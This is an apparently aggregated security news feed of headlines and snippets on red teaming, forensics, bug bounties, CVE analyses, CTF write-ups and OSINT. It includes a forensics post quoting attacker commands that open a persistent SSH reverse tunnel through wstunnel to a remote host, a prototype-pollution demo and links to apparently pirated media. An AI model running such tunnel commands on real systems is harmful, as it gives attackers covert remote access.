    Hi everyone it’s been a while since I’ve posted but been a wild ride on Red Team stuff for a while. I wanted too share another part of Red Team Notes that I’ve been working for helping beginners as always! Trying to jump onto this category of hacking, as always enjoy! Please reach out if any errors! https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/red-team-infrastructure submitted by /u/Dmcxblue [link] [comments]
  • Open

    MITRE Engenuity ATT&CK results are out
    submitted by /u/DanielWalker12 [link] [comments]
  • Open

    LUKS encryption
    Reaching out for some help. I’m not familiar at all with Linux. I have an HDD that was ATA password protected. I was able to take it to our state police and they removed it with their Atola. I imaged the drive and found that it’s encrypted with LUKS. I have no memory image as the computer was dropped off at out PD by a reporting party. How/can you get past the LUKS encryption? It’s currently running through Passware as I type this. Case is involving CSAM. submitted by /u/HorseAdministrative7 [link] [comments]
    Research sources for low level forensics?
    So I am working on a challenge last week and an image was taken from a Iphone SIM and using only hex editor we need to find unidentifiable information, location, phone number, carrier and some random information was removed and we need to identify what data is missing. I attempted to research on google but it is almost all casual questions about recovering phone data. I attempted stack overflow and reddit but neither seemed to have any information on the subject. What are some terms or sources I could have used to research this process? What is the stack overflow for forensic professionals. (By the way, I did not win the challenge) submitted by /u/CoreRun [link] [comments]
  • Open

    Stored XSS To Other Users Via Messages
    Welcome back, I hope everyone had a good bank holiday Easter. Continue reading on System Weakness »
    Stored XSS To Other Users Via Messages
    Welcome back, I hope everyone had a good bank holiday Easter. Continue reading on Medium »
    Broken Authentication Login With Google
    Hello Guys! Continue reading on Medium »
    Grow With Us
    Bug Zero is striving to share knowledge among the people and we are keen to promote your voice through our medium. Continue reading on Bug Zero »
    How I got My first Disclosed XSS
    Intro : Continue reading on Medium »
    Hacking the University in a Few Steps
    Escalating a Wrong Date to Get Code Execution Continue reading on Medium »
    Hack Wi-Fi Using Aircrack-ng
    Hello Everyone! In this article I tell you how to hack and crack wifi password using aircrack-ng which is a terminal based tool. Continue reading on Medium »
  • Open

    What's the name of the subject I'm trying to learn about?
    So I'm working my way through the TryHackMe penetration tester course and I'm finding myself lacking a fundamental understanding of things like requests (get/post/etc) and things that I would need to understand before being able to know what anything is with Burpsuite, and I'm having a hard time figuring out what the topic is called that I need to learn more about. For example, Im feeling stuck on PHP file inclusion attacks because I don't understand what Requests actually are, or if there is anything besides get and post. Do I just need to learn how PHP works, or is there a more broad subject that would include that? submitted by /u/GrassyNotes [link] [comments]
    How can one prepare for Attack/Defense CTF's?
    Hey AskNetsec, I'm curious about Attack / Defense CTF's. They seem really exciting but i'm not sure how exactly to prepare for one (because it sometimes involves exploiting services that were made specifically for the competition). What skills do Attack/Defense CTF's train? How can one best prepare for them? Full disclosure, I'm working on a little YT video on Attack/Defense CTF's for my "Learn with Intern" series so this post will help inform that. Here is an example: https://www.youtube.com/watch?v=OVEnPi__I_8 TLDR: What skills do Attack/Defense CTF's train? How can one best prepare for them? submitted by /u/NSP781 [link] [comments]
    Aspiring Junior Penetration Tester Question/Tips
    Hello reddit community. I am an aspiring Junior Pen Tester. I passed the eJPT exam back in November, and I am trying to gain some knowledge towards penetration testing through certifications and TryHackMe/HTB. Right now, I have around 500$ to invest in a certification. My question is the following: ​ After eJPT that I already passed, should I go for eCCPTv2 , CRTP (To gain AD knowledge) or PNPT ? I know that many of you will insist to go for the OSCP. But right now I cannot afford it. What would be the best next step? ​ Thank you very much in advance submitted by /u/apostonikos [link] [comments]
  • Open

    An attacker can archive and unarchive any structured scope object on HackerOne
    HackerOne disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1501611 - Bounty: $12500
    SSRF occurrence in website preview used by LINE Official Account Manager (https://manager.line.biz)
    LINE disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1131608 - Bounty: $100
    Deleting someone else's profile image with a GraphQL query in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/952095 - Bounty: $600
    Use of unreleased features in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/975428 - Bounty: $100
    SSRF restricted to HTTP/HTML on LINE Social Plugins (https://social-plugins.line.me/)
    LINE disclosed a bug submitted by duahaubadao: https://hackerone.com/reports/860939 - Bounty: $1350
  • Open

    War in Ukraine / April 17
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TAMU CTF 2022 Writeup — OSINT: Gilberto’s Brother
    This challenge provides little other than a screenshot seen below and the directive to fine birth dates for bothe Gilberto and his unnamed… Continue reading on Medium »
    4 сервіси спостереження за погодними умовами
    ТОП-сервісів для збору метеорологічної інформації, спостереження за атмосферними явищами та прогнозу погоди. Онлайн-мапи клімату й погоди. Continue reading on KR. LABORATORIES IT BLOG »
    Best Chrome extensions for OSINT!
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    Kidnapping of civilians: Russia’s war of intimidation
    The Russian occupation deliberately kidnapped civilians, journalists and politicians in order to break down the Ukrainian resistance in… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-18 Review
    SecWiki周刊(第424期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-18 Review
    SecWiki周刊(第424期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Windows Red Team Cheat Sheet
    Windows for Red Teamers Continue reading on Medium »
  • Open

    CVE-2022-21907 Microsoft HTTP Protocol Stack DoS PoC
    Article URL: https://github.com/polakow/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=31072275 Points: 3 # Comments: 0
  • Open

    Prototype Pollution
    🔍 Introduction Prototype Pollution은 Javascript 처리 로직의 문제로 Object 들의 prototype을 수정할 수 있을 때 발생하는 보안 문제를 의미합니다. Object의 protype을 변경할 수 있는 경우 의도된 로직을 벗어나거나 DOM에 관여하여 XSS 등의 추가적인 문제를 발생시킬 수 있습니다. 1 2 3 4 5 6 7 8 9 let myObj = {} myObj['__proto__']['a'] = 'a’ // myObj의 prototype(__proto__) 의 a에 a를 넣습니다. console.log(myObj.a) let newObj = {} // 이후 newObj라는 Object를 만들었는데, // log를 보면 a가 찍힙니다.
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    FreeBuf早报 | GitHub封锁两家大型俄银行账户;金融平台漏洞或致银行信息泄露
    作为美国实施封锁制裁的一部分,GitHub已开始暂停俄罗斯注册用户的帐户,并封锁俄罗斯金融机构的账户。
    新型DDoS攻击泛滥: 利用中间盒的TCP反射放大攻击分析
    攻击者可以利用部分网络中间盒在TCP会话识别上的漏洞,实现一种全新的DDoS反射放大攻击。
    新型DDoS攻击泛滥: 利用中间盒的TCP反射放大攻击分析
    攻击者可以利用部分网络中间盒在TCP会话识别上的漏洞,实现一种全新的DDoS反射放大攻击。
    GitHub 封禁部分俄罗斯开发者账户
    GitHub 开始屏蔽受美国制裁公司的俄罗斯开发者账户。
    一个月疯狂窃取5.4亿美元,Lazarus Group黑客组织拿钱造导弹
    美国财政部指控黑客组织Lazarus Group3月从Axie Infinity 侧链 Ronin Network疯狂盗窃了5.4亿美元。
    Conti勒索组织声称其对Nordex发动勒索攻击
    近期,德国风力涡轮机制造商Nordex在其官网发布声明称遭受网络攻击。
    GitHub:OAuth 令牌被盗,数十个组织数据被窃
    GitHub 4月15日透露,网络攻击者正使用被盗的 OAuth 用户令牌从其私有存储库下载数据。
    企业如何打造“零成本”的安全方案 | FreeBuf甲方社群直播回顾
    4月14日晚间,FreeBuf甲方社群首场内部直播开启。欧普照明集团信息安全负责人樊正懿线上分享企业如何打造“零成本”的安全方案。
    从“零”开始 重铸信任 | CIS零信任安全论坛议题征集开启
    本次论坛FreeBuf邀请了诸多网络安全大咖,给参会观众带来更全面、更有价值的议题分享。
  • Open

    CVE-2022-22954 VMware Workspace ONE Access Server-Side Template Injection RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22954-vmware-workspace-one-access-server-side-template-injection-rce/ 安装环境 r师给的镜像 identity-manager-21.08.0.1-19010796_OVF10.ova,导入ova的时候要设置下fqdn,不然安装时链接数...
    Java 反序列化注入冰蝎内存马相关踩坑笔记
    作者:Y4er 原文链接:https://y4er.com/post/java-deserialization-inject-behinder-memshell-note/ 朋友叫帮忙打一个内存马进去,用的是cb链,无cc依赖,我寻思这不是有手就行吗,谁知道接下来遇到了无数的坑。 改造cb链去除cc依赖 这个是p牛讲过的了,不多说,直接贴代码 public Object getObject(...
    Go template 遇上 yaml 反序列化 CVE-2022-21701 分析
    作者:lazydog 原文链接:http://noahblog.360.cn/go-template-meets-yaml-cve-2022-21701/ 前言 本文对 CVE-2022-21701 istio 提权漏洞进行分析,介绍 go template 遇到 yaml 反序列化两者相结合时造成的漏洞,类似于 “模版注入” 但不是单一利用了模版解析引擎特性,而是结合 yaml 解析后造成...
  • Open

    CVE-2022-22954 VMware Workspace ONE Access Server-Side Template Injection RCE
    作者:Y4er 原文链接:https://y4er.com/post/cve-2022-22954-vmware-workspace-one-access-server-side-template-injection-rce/ 安装环境 r师给的镜像 identity-manager-21.08.0.1-19010796_OVF10.ova,导入ova的时候要设置下fqdn,不然安装时链接数...
    Java 反序列化注入冰蝎内存马相关踩坑笔记
    作者:Y4er 原文链接:https://y4er.com/post/java-deserialization-inject-behinder-memshell-note/ 朋友叫帮忙打一个内存马进去,用的是cb链,无cc依赖,我寻思这不是有手就行吗,谁知道接下来遇到了无数的坑。 改造cb链去除cc依赖 这个是p牛讲过的了,不多说,直接贴代码 public Object getObject(...
    Go template 遇上 yaml 反序列化 CVE-2022-21701 分析
    作者:lazydog 原文链接:http://noahblog.360.cn/go-template-meets-yaml-cve-2022-21701/ 前言 本文对 CVE-2022-21701 istio 提权漏洞进行分析,介绍 go template 遇到 yaml 反序列化两者相结合时造成的漏洞,类似于 “模版注入” 但不是单一利用了模版解析引擎特性,而是结合 yaml 解析后造成...
  • Open

    CVE-2022-21882 Win32k内核提权漏洞深入分析
    1、漏洞介绍 2、漏洞影响版本 3、分析环境 4、背景知识 5、漏洞成因 6、利用漏洞的流程 6.1、触发用户态回调 6.2、HOOK回调函数 6.3、修改窗口模式为模式1 6.4、回调返回伪造偏移量 6.5、泄露内核窗口数据结构 6.6、如何布局内存 7、EXP分析调试 8、两种提权方式 8.1、设置token 8.2、修改Privileges 9、补丁分析 10、参考链接 CVE-2022-21882漏洞是Windows系统的一个本地提权漏洞,微软在2022年1月份安全更新中修补此漏洞。本文章对漏洞成因及利用程序进行了详细的分析。 1 漏洞介绍 CVE-2022-21882是对CVE-2021-1732漏洞的绕过,属于win32k驱动程序中的一个类型混淆漏洞。 攻击者可以在user_mode调用相关的GUI API进行内核调用,如xxxMenuWindowProc、xxxSBWndProc、xxxSwitchWndProc、xxxTooltipWndProc等,这些内核函数会触发回调xxxClientAllocWindowClassExtraBytes。攻击者可以通过hook KernelCallbackTable 中 xxxClientAllocWindowClassExtraBytes 拦截该回调,并使用 NtUserConsoleControl 方法设置 tagWNDK 对象的 ConsoleWindow 标志,从而修改窗口类型。 最终回调后,系统不检查窗口类型是否发生变化,由于类型混淆而引用了错误的数据。flag修改前后的区别在于,在设置flag之前,系统认为tagWNDK.pE…

  • Open

    Windows Persistence: Registry Run Keys
    After getting a foothold on a target, the next goal should be to persist on that target. If no persistence method is utilized, then the… Continue reading on Medium »
    CrowSec EdTech Write-Up: Hijacking
    This article is about the CTF (Capture The Flag) called “Hijacking”, where I learned much about new techniques of privillege escalation… Continue reading on Medium »
    The Story of A Simple SentinelOne Hash Blacklist Bypass
    (Originally Posted on 2021–06–02) Continue reading on Medium »
  • Open

    Caught some kind of DNS server running in a local IP. Virus? Spyware?
    Hi everyone, I caught some apps unrelated to each other trying to connect to 10.0.0.241 My local lan is in the 192.168.x.x range so there should be nothing in 10.0.0 Investigated and apparently there's a DNS server I knew nothing about running locally. WTF is this mofo, how do I kill it, is this a sign of some kind of infection? I did an nmap and it showed this: Starting Nmap 7.92 ( https://nmap.org ) at (date and time) Nmap scan report for 10.0.0.241 Host is up (0.029s latency). Not shown: 994 closed tcp ports (conn-refused) PORT STATE SERVICE 53/tcp open domain 389/tcp filtered ldap 636/tcp filtered ldapssl 1099/tcp filtered rmiregistry 3268/tcp filtered globalcatLDAP 3269/tcp filtered globalcatLDAPssl Nmap done: 1 IP address (1 host up) scanned in 23.27 seconds Then I did a traceroute and saw this: traceroute to 10.0.0.241 (10.0.0.241), 64 hops max, 52 byte packets 1 * 10.28.18.1 (10.28.18.1) 33.628 ms 27.414 ms 2 2a28115c3952 (10.0.0.241) 27.610 ms 27.397 ms 31.312 ms submitted by /u/my_humble_chapeau [link] [comments]
    I'm new to Incident Response. Any Tips?
    Hey there, I'm starting to be more involved in our newly formed Incident Response Team. Basically a group of Individuals discussing the further operations after a vuln appears. ​ Do you guys have any Tips ? submitted by /u/No_Bumblebee_5793 [link] [comments]
    My online school is having some kind of cyber attacks on our Zoom classes
    Im running an online school with some paid and unpaid students overseas, including China, and we recently started having attacks that make the Zoom meeting software behave in unusual ways and crash. After I turned off my router (this resets the local IP) the attacks stopped for a few minutes, but then resumed. Today after my PC was off for a long period of time as soon as I started a zoom meeting the program lagged/glitched and crashed, I had to cancel the meeting. I fired up a VPN immediately and restarted, this fixed the problem. My thinking is that if I connect to a specific students computer, we the issue is coming from overseas, that the attacks will start again, and could maybe they could even cause us a problem by getting around the VPN? I’m just one person running a very small bu…
    If Facebook is selling your information
    Then where can I buy it? submitted by /u/zethara [link] [comments]
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    Ti West’s “X”: an Overrated Throwback
    A work of art or entertainment can have a lot on its mind and under its hood, but if you don’t like it, you don’t like it, and no amount… Continue reading on Fanfare »
    X: Slasher entrega aos fãs de terror o que eles querem
    Novo filme da A24 é um slasher divertido e projeto ambicioso que respeita os dogmas do gênero e brinca com caricaturas da indústria do… Continue reading on Medium »
  • Open

    THCon CTF Writeup - SHA-1 exploitation, PHP LFI and RCE
    submitted by /u/GuyLewin [link] [comments]
    Semgrep rules for smart contracts based on DeFi exploits
    submitted by /u/iterablewords [link] [comments]
    Packets Remystified: Broadcast Brujería
    submitted by /u/0xdea [link] [comments]
    Spock SLAF is a Shared Library for Application Firewall "SLAF". It has the purpose to protect any service that uses the OpenSSL library. The SLAF inserts hooking to intercept all communication to detect security anomalies and block and log attacks.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Web Attack Cheat Sheet
    Discovering Continue reading on Medium »
    Knock Subdomain Scan
    Knock Subdomain Scan v5.3.0 Continue reading on Medium »
    Open Redirection & Broken Link Hijacking
    Let us learn about Open Redirection & Broken Link Hijacking Continue reading on Medium »
    SQL Injection in Harvard’s Subdomain
    Hi there! I’m Bibek Neupane from Nepal. In this first-ever write-up of mine, I’ll try to cover my story of finding a SQL Injection on… Continue reading on Pentester Nepal »
  • Open

    War in Ukraine / April 16
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Where’s Trump?
    Pin Pointing Trump Continue reading on Medium »
    Geo Location From Mr.Robot
    Where’s Elliot? Continue reading on Medium »
    Identification of the owner of Google Docs
    Today we will study the possibility of identifying the owner of Google documents. In the simplest version, you just need to open the file… Continue reading on Medium »
  • Open

    Leveldb File Forensics
    I want to examine the push notifications in a .ldb file. I know I can see the notifications, after some parsing, through a hex editor, but thought there has to be a better way. Does anyone know of a tool to allow me to view/dump the key values for an .ldb file? There's a great writeup from GIAC on how .ldb files work: https://www.giac.org/paper/gcih/20579/google-chrome-notification-analysis-in-depth/128522 But no mention to how to parse the information. I've tried a few GitHub tools without success: https://github.com/google/leveldb -- successfully compiled the tool. This tool seemed the most promising. I tried using the command: ./leveldbutil dump [filename].ldb but received the following error: Corruption: corrupted compressed block contents I don't think the file is corrupted, because when I view the contents in a hex editor, I can read the key-values from the Push Notifications. https://github.com/SuperMarcus/LevelDBViewer/releases - couldn't open the file. https://github.com/markmckinnon/Leveldb-py - couldn't open the file. Any suggestions? edit: Just tried a Python package called Plyvel: https://plyvel.readthedocs.io/en/latest/ >>> import plyvel >>> db = plyvel.DB("006264.ldb", compression=None) Traceback (most recent call last): File "", line 1, in File "plyvel/_plyvel.pyx", line 247, in plyvel._plyvel.DB.__init__ File "plyvel/_plyvel.pyx", line 88, in plyvel._plyvel.raise_for_status plyvel._plyvel.IOError: b'IO error: 006264.ldb/LOCK: Not a directory' >>> ​ submitted by /u/Praxxer1 [link] [comments]
  • Open

    SecWiki News 2022-04-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    [Cullinan #32] Add SSE and Kiterunner!
    Cullinan 로그 #32입니다. SSE와 Kiterunner 페이지를 새롭게 추가했고, threat modeling, ssti, xss, ssrf, oast 페이지에 업데이트가 있었습니다. New Add SSE(Server-Sent Events) Add Kiterunner Update Add resource to cullinan > threat modeling Add tools to cullinan > ssti Add short xss to cullinan > xss Add combined xss to cullinan > xss Add bypass with 20x to cullinan > ssrf Add bypass with toctou to cullinan > ssrf Add dns pinning to cullinan > ssrf Add bypass with ffmpeg to cullinan > ssrf Add bypass techniques to cullinan > oast 그리고 어느정도 데이터가 정리되면, 블로그 내 tag(e.
  • Open

    Some movies (not all checked so NSFW) WARNING VERY SLOW
    Theres several movies in the movie folder, arranged quite weirdly. https://dl3.3rver.org/hex1/ I do not know what are in the other folders submitted by /u/NursingGrimTown [link] [comments]
    Went looking for Moon Knight comics.
    I know at least 1 is a repost. https://archives.eyrie.org/anime/ https://www.greenlittleapple.com/ln/ This one was a bit iffy - it is up and down for me. https://booksdl.org/comics0/_0DAY/0-Day%20Week%20of%202019.09.11/ submitted by /u/ringofyre [link] [comments]
    English & Intl movies, animation, PC games, other stuff
    http://103.152.18.18/Data Kind of slow but functional. submitted by /u/rippleredial [link] [comments]
  • Open

    Cracking Kubernetes RBAC Authorization Model
    This post first appeared as Limiting access to Kubernetes resources with RBAC, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and very friendly to beginners. The version posted here in contrast has a biased focus on the design and implementation, as well as in-depth discussions. TL; DR This post digs into the Kubernetes RBAC authorization (AuthZ) model. Specifically, given technical requirements of granting proper permissions to an application to access kube-apiserver, we’ll introduce concepts like User, ServiceAccount, Subject, Resource, Verb, APIGroup, Rule, Role, RoleBinding etc step by step, and eventually build a RBAC authorization model by our own. Hope that after reading this post, readers will have a deeper understanding on the access control (AuthZ) of kub…

  • Open

    Threat Actor Profile - ALPHV
    submitted by /u/RandyMarsh_Lorde [link] [comments]
  • Open

    business.amazon.com Has a HUGE VULNERABILITY that allows attackers to send emails
    Hi everyone. I made a post about about a weird spoof email I received from business.amazon.com that may hint a possible vulnerability pertaining to the DNS records for business.amazon.com.Post I think someone figured out what is going on with this comment I got the attention of AmazonHelp over at Twitter (Link To AmazonHelp's comment) Update: Here is are some screenshots of how the conversation is going over at Twitter (https://imgur.com/a/ggZSVyk) submitted by /u/possiblyahermit [link] [comments]
    Understanding Port Forwarding Commands
    Hi all, I'm doing some forensics at the moment (...school environment). I just wanted to get some feedback on my interpretation of these commands. I don't have a lot of experience with bouncing traffic around. nohup ./wstunnel -L 8888:localhost:22 ws://w.x.y.z:80 & sleep 2 nohup ssh -o "StrictHostKeyChecking no" -R 2222:localhost:22 -p 8888 -N kali@localhost & First line: No hang-up (persist), start a websocket tunnel that binds to port 8888 on localhost, and forwards to port 22 (moving the communication over SSH). The tunnel destination is w.x.y.z:80, and the command is backgrounded. Last line: No hang-up (persist), and specify that connections to port 2222 on localhost should be forwarded to port 22. Do not execute a remote command (-N) and connect via SSH to kali@localhost (which is a remote attacker, I think. Not sure why it is called "localhost"), and background the command. It's definitely a bit confusing for me to parse. Am I off the mark? submitted by /u/InfamousClyde [link] [comments]
    How do you organise your knowledge on long engagements?
    For CTFs, I use cherrytree for notes, but it doesn't scale to a group. At the company, we use text files (markup) in folders, and regular files in folders. And do a full text index on the whole mess. (Of course some stuff, like bloodhound data, can't be easily indexed) And we can't even agree on folder names. Sometimes you know the host name of a box, sometimes only the IP. Boxes have more than one IP. The same windows box may get a different IP the next day via DHCP. The company may have two 192.168.1.X subnets, that just don't route to each other. (We had a look at dradis & pentest.ws and found them too restrictive/opinionated, but maybe we have to give them another try) - How do you organise your knowledge? - Any workflows or tools that work well? Thanks! submitted by /u/MOVSQ [link] [comments]
    Is network+ and web pentreation testing enough to land an entry job as a pentreation tester ?
    So I finally networked with one guy who works as a manager for a cyber secruity team ,he is one of the best in my country ,a geeky guy who is very familliar with pretty much everything . Under him he has many teams for mobile,iot ,web,and others . He told me that I should have sold knowledge of networks and web , and practise hacking challenges mainly on web pentreation testing ,and machines on hackthebox . I asked him if i should focus on reverse engineering,exploit development . He told me many stuff on that , first is that it requires many understanding on OS, architecure,and compilter theory ,second is that there aren't many jobs in them except in hardware hacking and IOT . But if i want to practise reverse engineering challenges besides Web that is fine . The problem is that i feel …
  • Open

    How to create a Satellite Imagery Time-Lapse: Case Study of Myanmar & the South China Sea.
    A time-lapse is essentially multiple amounts of satellite images over a specific string of time whether that be over weeks or months or… Continue reading on Medium »
    War in Ukraine / April 15
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    OSINT in GitHub…
    Let’s take a look at the main data sources that are used when conducting OSINT research in the GitHub service: Continue reading on Medium »
    OSINT in Discord
    Today I’m going to break down the main sources of data I use when doing OSINT user profile research on Discord: Continue reading on Medium »
  • Open

    [https://shipit-sox-staging.shopifycloud.com] Presence of multiple vulnerabilities present in Ruby On Rails
    Shopify disclosed a bug submitted by beastglatisant: https://hackerone.com/reports/1400309 - Bounty: $500
    Account takeover leading to PII chained with stored XSS
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1483201
  • Open

    Any ideas what college students would love to see from a guest speaker?
    I work in DFIR, and I’ve been invited to talk to college students about my experience, the field, etc. any good ideas of what I should include and make sure to talk about? submitted by /u/tfulab23 [link] [comments]
  • Open

    SecWiki News 2022-04-16 Review
    半天打穿某高校 by ourren 基于图查询的攻击溯源方法 by ourren Banli板栗-高危资产识别和高危漏洞扫描 by ourren SCA的困境和出路 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-16 Review
    半天打穿某高校 by ourren 基于图查询的攻击溯源方法 by ourren Banli板栗-高危资产识别和高危漏洞扫描 by ourren SCA的困境和出路 by ourren 更多最新文章,请访问SecWiki
  • Open

    Pandora Swap is launching a Bug Bounty Program
    Hi, Pandora Legion! We are very impressed and mesmerized by your love, support, and interactions. and we have a new announcement to make Continue reading on Medium »
    How I Hacked My School’s Students Portal to get access to any student’s details?
    Introduction Continue reading on Medium »
    HOW RECON HELPED ME TO GET A STORED XSS!
    RECONNAISSANCE IS THE KEY IN BUG BOUNTIES Continue reading on Medium »
    Linux User Controls
    What is Linux Continue reading on Medium »
    Port scanning and service discovery in 2022 — we have failed as a humanity
    There have been a lot of popular port scanning projects lately. In particular, these are projects that seek to combine fast port discovery… Continue reading on Medium »
    How we spoofed ENS domains for $15k
    TL;DR: We found a flaw that allowed us to spoof Ethereum domain names and received a $15k bounty. Continue reading on Medium »
    Change Any User Profile Details on Disney
    The Walt Disney Company started its program on Hackerone in March 2022. Continue reading on Medium »
    Creating Your Own Telegram Bot For Recon Bug Bounty
    Hello Friends this is my fourth blog regarding bug hunting Continue reading on Medium »
  • Open

    Kiterunner
    🔍 Introduction Kiterunner는 Assetnote에서 만든 Content-Discovery 도구로 지정한 위치에 Fuzz/BruteForce 방식의 일반적인 도구가 아닌, 알려진 Swagger Spec 데이터와 자체 스키마로 압축된 데이터 세트를 사용하여 API 스펙을 추측합니다. 그리고 알려진 HTTP Method, Header, Path, Param 등을 전송하며 API Endpoint를 찾는 도구입니다. 참고로 Assetnote는 주기적으로 변하는 Wordlists를 가지고 운영하기 때문에 Kiterunner가 사용하는 Wordlist 자체가 이미 단순한 리스트가 아닌, 실제로 웹에서 많이 사용되는 데이터를 기반으로한 리스트입니다. 당연히 더 빠르고 좋은 결과를 만들 수 있겠죠.
  • Open

    Industroyer2: The Worst Sequel
    submitted by /u/entropydaemon5 [link] [comments]
    GitHub: Security alert - Attack campaign involving stolen OAuth user tokens issued to two third-party integrators (Heroku and Travis CI)
    submitted by /u/DAMNIT_RENZO [link] [comments]
  • Open

    PhpMyAdmin文件包含漏洞白盒解析(从理论到实战)
    通过对主流mysql连接框架的白盒解析,配合实战的记录,方便读者能更快学以致用
    虚拟靶场抓到巨帧包!
    在自己的虚拟化靶场中抓包,发现 wireshark 面板中的 Length 远大于 MTU,而明明在抓包网卡的MTU是1500,这是为什么呢?
    HackTheBox之Overflow靶机
    前言这是一台困难靶机,靶机内容主要考察了web漏洞利用,逆向,权限维持,提权等各个方面的内容。
  • Open

    JekyllBot:5 A Security Vulnerability Affecting Hospital Robots [pdf]
    Article URL: https://assets.website-files.com/5d2ad783e06f4c19469d363a/625551dd440d0b187fa96d38_JekyllBot-5-Vulnerability-Disclosure-Report.pdf Comments URL: https://news.ycombinator.com/item?id=31048534 Points: 1 # Comments: 0
  • Open

    Resource Based Constrained Delegation
    A quick read on an attack path that can be leveraged to escalate network privileges and for lateral movement. Continue reading on Medium »

  • Open

    PYSA Ransomware Group Technical Analysis
    submitted by /u/wtfse [link] [comments]
    [Techmonitor.ai] Failed cyberattack on Ukraine's electricity grid could indicate Russia's growing willingness to attack critical infrastructure
    submitted by /u/NoStarchPress [link] [comments]
    New tool to exploit TURN servers - create a socks proxy into the internal network
    submitted by /u/FireFart [link] [comments]
    Multiple Vulnerabilities in Cisco Expressway
    submitted by /u/FireFart [link] [comments]
    Turncoat - Extract private messages from malware/phishing Telegram Bots
    submitted by /u/DoOrDieCalm [link] [comments]
    iViewed your API keys
    submitted by /u/Gallus [link] [comments]
  • Open

    Stored XSS, SQL, IDOR and Hall Of Fames
    Hello, today I am going to be writing about how I found stored XSS, reflected XSS, SQL and IDOR all within a software that was in scope… Continue reading on Medium »
    Mining Liquidity for Bug Bounty Contribution
    Hats Finance is excited to introduce Protocol Protection Mining starting in Q2 2022, allowing anyone in the ecosystem to become a… Continue reading on Medium »
  • Open

    A Detailed Guide on Medusa
    Hi Pentesters! Let’s learn about a different tool Medusa, which is intended to be a speedy, parallel and modular, login brute forcer. The goal of The post A Detailed Guide on Medusa appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Medusa
    Hi Pentesters! Let’s learn about a different tool Medusa, which is intended to be a speedy, parallel and modular, login brute forcer. The goal of The post A Detailed Guide on Medusa appeared first on Hacking Articles.
  • Open

    Autopsy web cache understanding
    Hello everyone, I am a junior analyst and today I was doing a forensic on a disk from one PC with Autopsy. I had some alerts of a user accessing some malicious website and running some sort of DoS attack. I checked browser history and could not find any log of opening that website (he could be removed it or opened in a private window), but when I was doing forensic in Autopsy, in Web Cache I could find multiple web caches like this for example: URL: https://okay-website.com https://malicious-website.com URL: https://okay-website.com https://malicious-website.com https://malicious-website.com/target/blablabla For some of these, the domain was also pointing to the https://malicious-website.com Now my question is, as I could not able even in Autopsy web history find that website, nor did I find some downloads or anything else, was it possible that the user did not open a malicious website, but that okay-website.com did in the background? I am not sure if I understood 100% what is the meaning of those web caches. Now a few things to know: 1) Alerts that I got were at the exact same time as the user opened okay-website for the first time 2) In Web Cache I could see similar results for other domains that are linked to the advertisement 3) With uBlock Origin I can see those ad URLs that he blocked, the very same as in autopsy, but I can not see the malicious site. ​ Cheers and thanks submitted by /u/facyber [link] [comments]
    How Mobile Forensic tools work ??
    Hi community… Commercial available tools like Cellebrite UFED in Mobile Forensics obtain deleted data by rooting the device … But how’s it possible without installing the Magisk and unlocking the bootloader .. Even after the process the device doesn’t show any trace for root .. Any idea on the details of the tools .. Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Malware Lab / Analysis - Internet Connectivity - Analyzing Secondary Payloads?
    I have a question around malware labs and handling external communications. I've been building out a Malware analysis lab in VMWare with a REMnux VM and a Win10 machine. Obviously the machines should be isolated on their own internal network isolated from my primary workstation. So my question with this setup is, how do we analyze secondary payloads that may require a download from the internet if the VM's don't have a way of getting out? We can capture that the initial payload is attempting to reach out to a domain or IP to pull something down, but it won't be successful. Just curious if there's a safe way to workaround this, or if we don't really concern ourselves with actually grabbing the secondary payload from the web that it's trying to get? submitted by /u/IHadADreamIWasAMeme [link] [comments]
    Which Linux distribution would you recommended for only using as quarantina?
    I want to create a virtual machine that I will use it to download files that I think malicious. A distribution without unnecessary applications would be great to be honest but I could need some basic tools while opening the files. And I need a GUI too. Which distribution would you recommended to me? submitted by /u/Cpt_Winters [link] [comments]
    Building a vulnerability management dashboard
    So I am not a developer but I was asked to develop a dashboard for vulnerability management. I think of nessus instantly. Is there an open source dashboard I can work with? I am very new at this. I will remove this post if its a wrong sub reddit to ask in. submitted by /u/light_striker12 [link] [comments]
    Career Shift
